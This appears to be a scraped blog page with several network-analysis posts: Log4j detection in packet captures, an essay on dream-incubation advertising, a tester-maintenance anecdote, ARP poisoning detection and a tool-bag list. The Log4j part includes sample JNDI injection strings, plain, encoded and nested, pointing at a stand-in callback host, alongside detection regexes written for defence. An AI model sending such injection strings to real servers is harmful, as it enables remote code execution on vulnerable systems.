Unless we have been under a rock for the past few weeks, or on a distant island with no internet connectivity, we have been actively dealing with the most impactful zero-day vulnerability discovered this year.
In this video, we will look at how we can use packet capture and analysis to identify and filter for a Log4j attack. We break down how the attacker uses the HTTP User-Agent field to attempt to plant a reverse-callback shell script.
Download the pcap and follow along with the video!
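To make the User-Agent check concrete, here is an added example (not code from the video or the linked pcap) that pulls the User-Agent header out of reassembled HTTP requests and flags Log4j lookup syntax. The sample requests, hostnames and the `classify` labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not taken from the pcap the post links to).
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: ${jndi:ldap://callback.example.invalid/a}\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: shop.example\r\nuser-agent: %24%7BJNDI:ldap://callback.example.invalid/a%7D\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: ${${lower:j}ndi:ldap://callback.example.invalid/a}\r\n\r\n",
]

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # direct JNDI lookup
NESTED = re.compile(r"\$\{[^}]*\$\{")                 # a lookup nested inside another lookup

def user_agent(raw: bytes):
    """Return the User-Agent value from a raw HTTP request, or None if absent."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "user-agent":  # header names are case-insensitive
            return value.strip()
    return None

def classify(raw: bytes) -> str:
    """Label one request by what its User-Agent contains."""
    ua = user_agent(raw)
    if ua is None:
        return "no-user-agent"
    decoded = unquote(ua)  # percent-decode once so an encoded form is also matched
    if JNDI.search(decoded):
        return "jndi-lookup"
    if NESTED.search(decoded):
        return "nested-lookup"  # no legitimate browser sends nested ${...} in this header
    return "clean"

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(classify(request), "|", user_agent(request))
```

The same idea works as a quick Wireshark display filter such as `http.user_agent contains "jndi"`, although a plain substring filter misses the nested form that the second pattern catches.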
It hit me one afternoon as I walked into our local CVS drugstore to buy mouthwash. While the automatic doors were opening before me, my phone buzzed with a text message. It was from CVS, with a link to all their current sales and coupons. As I looked around the store, my epiphany struck. My devices may be monitoring my movements for health purposes, but information on every store I visit and every purchase I make is somewhere in the cloud, waiting to be exploited.
Marketing technology extends far beyond mere locational surveillance. Back when I was a youngster going to movie theaters, word leaked out that they were placing brief pictures of hot buttered popcorn and other temptations into the trailers to stimulate a subliminal desire to visit the snack bar. Fearful of Communist propaganda being broadcast in a similar manner, the Federal Communications Commission and members of Congress summoned market researcher James Vicary to put on a demonstration. No one was convinced it worked, and Vicary later admitted he had faked his data. Nevertheless, laws were passed to guard against such practices.
More recently, theaters are much less subtle, showing lengthy commercials for food before the trailers even begin. Product placements in the films themselves are yet another way that theaters manipulate us. Going to actual theaters is becoming quaint, but that hasn’t stopped advertisers from messing with our heads.
The Super Bowl is one of the biggest advertising events of the year, and companies spend up to $10 million per minute to pitch their wares to over 100 million viewers. At these stakes, there are few limits to what advertisers will do to secure a return on their investment. Coors beer brewer Molson-Coors conducted what they euphemistically called a “dream study” on the night before Super Bowl LV. On advice from a Harvard psychologist, they designed dream incubation stimuli to associate images of Coors beer with positive imagery like refreshing alpine rivers. If you rushed out Sunday morning for last-minute Super Bowl party supplies and came back with a cold case of Coors beer, now you know why.
Molson-Coors isn’t the only one trying to alter our behavior. A 2021 survey of 400 marketers by the American Marketing Association New York found that 77 percent of them were planning on deploying dream incubation technology over the next three years. This focus on the commercial exploitation of dreams might seem at first glance to be the latest trend, but the idea has been around for decades.
While psychiatrist Sigmund Freud was securing a place in history with his theories of dreams and the unconscious, his lesser-known nephew Edward Bernays focused on public influence through the creation of unconscious associations and desires. The connections between cars and masculinity, cigarettes and rugged individualism, or alcohol and an active social life were engineered by Edward and his disciples when we had no idea what was happening.
Sleep has been accepted as a mysterious yet powerful interlude throughout history. When I was an undergraduate, my fellow students and I would often stay up late cramming the night before an exam. Although we might have justified this by saying that we were incubating freshman chemistry into our dreams, the truth is that we had procrastinated until the last possible moment. To the best of my knowledge, there is no good data on reasonable study habits to compare this with.
There is plenty of folklore around the belief that dreams enable creativity. Musicians, writers, and painters often say they wake up from a dream with fresh inspiration for their art. In Salvador Dali’s book 50 Secrets of Magic Craftsmanship (1948), the great Spanish surrealist documented his technique for falling asleep in a chair with a key in his hand suspended over a plate. He would drift off while thinking about a problem he was trying to solve, and when his hand relaxed the key would fall onto the plate and awaken him, often with the solution he was seeking.
We have come a long way since the key-and-plate contraption, and the tools of modern science have allowed us to explore the effects of external stimuli on brain waves and eye movements in fine detail. We know now that people are very vulnerable to suggestion when in certain stages of sleep, and we are getting better at detecting those stages by listening to the sounds of breathing and body movements. A well-timed proposal could influence our dreams and behaviors without us ever suspecting. A simple smart speaker could do the trick, and today over 40 million of us have one in our bedroom.
Sweet dreams.
Author Profile - Paul W. Smith - leader, educator, technologist, writer - has a lifelong interest in the countless ways that technology changes the course of our journey through life. In addition to being a regular contributor to NetworkDataPedia, he maintains the website Technology for the Journey and occasionally writes for Blogcritics. Paul has over 40 years of experience in research and advanced development for companies ranging from small startups to industry leaders. His other passion is teaching - he is a former Adjunct Professor of Mechanical Engineering at the Colorado School of Mines. Paul holds a doctorate in Applied Mechanics from the California Institute of Technology, as well as Bachelor’s and Master’s Degrees in Mechanical Engineering from the University of California, Santa Barbara.
The scenario plays out pretty much the same way: I'm working with a client and they go get a ‘tool’ to troubleshoot something with me.
They retrieve the tool and realize that the person who purchased and used it the most no longer works there. No problem, I know how to use it.
First issue: the battery is dead. No worries, let's plug it in while we get organized. I suggest that if your tools have removable batteries, you remove them when storing the tool. Depending on the design of the tool and case, the power button might get pressed. In other scenarios, I’ve seen the tool left powered on and put back in the case.
Great, the charger isn’t in the case. So now the power adapter Easter egg hunt commences. An obvious tip: keep the power adapter with the unit. We did find it in another case. Apparently, one of the adapters got lost, so they were reusing this one with multiple tools.
Now that the device is charging, let's check the version of the software to ensure it's up to date. This requires us to log in to the vendor's website. Of course, no one knows the login information because the fellow who left was responsible for the tool. A quick password recovery effort and we’re ready to go.
That’s where this video comes in. I thought it would be helpful to document how to update the NetAlly LinkRunner G2’s software since some tools have a different procedure.
On a scale of 1 to 10 I would say that the NetAlly upgrade process was a solid 9. The only criticism I would provide is that it would be helpful if the tool simply notified the user that a current version is available so you don’t have to manually check.
If you are interested in more info, contact https://netally.com
In this video we take a peek at how an ARP Poison attack really works. Instead of just downloading a tool like Ettercap and hitting "Go", we want to know what really happens under the hood. This way we can quickly spot ARP Poison behavior if we are ever the target of a man-in-the-middle.
In a future video, we will look at how to set pre-saved filters in Wireshark to quickly spot this behavior.
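One common way to spot the behavior described above is to watch for an IP address whose claimed MAC address changes during a capture. The following is an added example, not code from the video: it parses raw Ethernet/ARP frames and reports such conflicts. The frames, MAC and IP addresses are constructed, and the helper names are hypothetical.

```python
import struct
from ipaddress import IPv4Address

def mac(text):
    return bytes.fromhex(text.replace(":", ""))

def arp_frame(oper, sha, spa, tha, tpa):
    """Build a simplified Ethernet + ARP frame (constructed sample data only)."""
    eth = mac(tha) + mac(sha) + struct.pack("!H", 0x0806)   # dst, src, EtherType ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)      # Ethernet, IPv4, 6, 4, opcode
    return (eth + arp + mac(sha) + IPv4Address(spa).packed
            + mac(tha) + IPv4Address(tpa).packed)

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return oper, frame[22:28].hex(":"), str(IPv4Address(frame[28:32]))

def find_conflicts(frames):
    """Report (frame_index, ip, first_seen_mac, new_mac) when an IP's sender MAC changes."""
    seen, alerts = {}, []
    for index, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        _, sender_mac, sender_ip = parsed
        if sender_ip in seen and seen[sender_ip] != sender_mac:
            alerts.append((index, sender_ip, seen[sender_ip], sender_mac))
        seen.setdefault(sender_ip, sender_mac)  # keep the first binding as the baseline
    return alerts

# Constructed capture: a host asks for the gateway, the gateway answers,
# then a second MAC also claims the gateway's IP address.
HOST, GATEWAY, OTHER = "02:00:00:00:00:50", "02:00:00:00:00:01", "02:00:00:00:00:99"
FRAMES = [
    arp_frame(1, HOST, "192.168.1.50", "ff:ff:ff:ff:ff:ff", "192.168.1.1"),
    arp_frame(2, GATEWAY, "192.168.1.1", HOST, "192.168.1.50"),
    arp_frame(2, OTHER, "192.168.1.1", HOST, "192.168.1.50"),
]

if __name__ == "__main__":
    for alert in find_conflicts(FRAMES):
        print("IP %s moved from %s to %s at frame %d" % (alert[1], alert[2], alert[3], alert[0]))
```

A changed binding is a lead to investigate rather than proof: gateway failover and DHCP reassignment also change the MAC seen for an IP address.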
One of the common questions I get asked is “What tools do you take on a job?”.
Trying not to sound like an infomercial or typical consultant 😉, I always start with the same response, “depends what you’re doing”.
Troubleshooting, design, installation and training obviously have their differences. Even if I zero in on the most obvious category of troubleshooting, there are still many variables to consider. This is best illustrated with examples.
When troubleshooting performance problems for a client/network that I am familiar with, I usually bring a tap, packet capture tool and my paper notebook. But if I was working on an unfamiliar network, I might want to bring a network discovery tool or software.
This is where my video comes in. Here I recommend bringing the appropriate cables as well as a good old USB flash drive. Since they are inexpensive, I’m in the habit of leaving them in my various tool bags.
The other pro to using USB drives is that you can use them in Windows, Linux, Apple, Android and other operating systems. I also carry around a USB extension cable and a micro-USB/USB adapter in case I want to copy data from the USB drive to my phone.
While typing this out, I realized that I missed something; tool bags or cases.
When I use any tool, the first thing I do is check out the bag or case that it came in, since you usually put cables, adapters and other related stuff with the tool.
It drives me crazy when a vendor provides a case that is such a tight fit for its tool that you can't even get the tool back into it, let alone find space for your cables, adapters or other items you might need for your job. Sometimes I find myself reusing bags from larger tools for smaller tools, or I have some larger bags that I keep specific stuff in.
I encourage you to build your own tool bag and let me know what you put in yours.